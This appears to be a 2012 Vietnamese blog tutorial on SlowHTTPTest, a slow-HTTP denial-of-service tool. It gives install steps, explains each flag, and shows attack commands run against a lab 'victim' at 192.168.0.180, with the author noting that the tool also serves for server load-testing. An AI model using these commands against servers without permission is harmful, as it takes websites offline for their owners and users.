New Post

Tuesday, October 23, 2012

Chào các bạn, hôm nay mình sẽ giới thiệu với các bạn công cụ SlowHTTPTest, bản chất công cụ này là để thực hiện một tấn công HTTP DOS nên dĩ nhiên các bạn có thể sử dụng nó với mục đích tấn công. Tuy nhiên, theo chiều hướng ngược lại, các bạn cũng có thể sử dụng công cụ này để thử nghiệm khả năng chịu tải của webserver trước khi public web
Trước tiên tải về SlowHTTPTest bằng câu lệnh
wget http://slowhttptest.googlecode.com/files/slowhttptest-1.4.tar.gz
Xả nén
tar -zxvf slowhttptest-1.4.tar.gz
Cài đặt
cd slowhttptest-1.4
./configure
make
make install
Để sử dụng SlowHTTPTest, chúng ta sử dụng câu lệnh
slowhttptest -c 1000 -B -g -o output-file-name -i 100 -r 300 -s 10240 -u http://www.example.com/url/page.html -x 20
Giải thích câu lệnh trên
-c Số lượng các kết nối, theo pr của tác giả SlowHTTPTest thì phiên bản 1.4 này có thể tạo tới 64000 kết nối

-H, B,  Xác định chúng ta sẽ sử dụng phần gọi là “slow down” trong header hay trong body của gói tin

-g  Sinh output dạng csv, xml, html

-i  Thời gian giữa 2 connection

-o  Định ra đường dẫn, tên file, nếu sử dụng lựa chọn này thì phải có -g

-r  số lượng kết nối trong 1 giây

-s  giá trị byte trong trường  Content-Length, yêu cầu phải có -B trước

-u  target URL

-v  mức độ chi tiết, có các mức từ 0-4

-x  Độ lớn (byte) tối đa của dữ liệu gửi đến
Trước tiên ta thử với 1000 connection tới victim 192.168.0.180
slowhttptest -c 1000 -B -g -o ouput_dos -i 100 -r 300 -s 10240 -u 192.168.0.180 -x 20
Refresh page nào, dữ liệu chậm, nhưng mà vẫn load được:

Nâng số connection lên, opps:

Đây là output của quá trình tấn công


0 nhận xét:

Post a Comment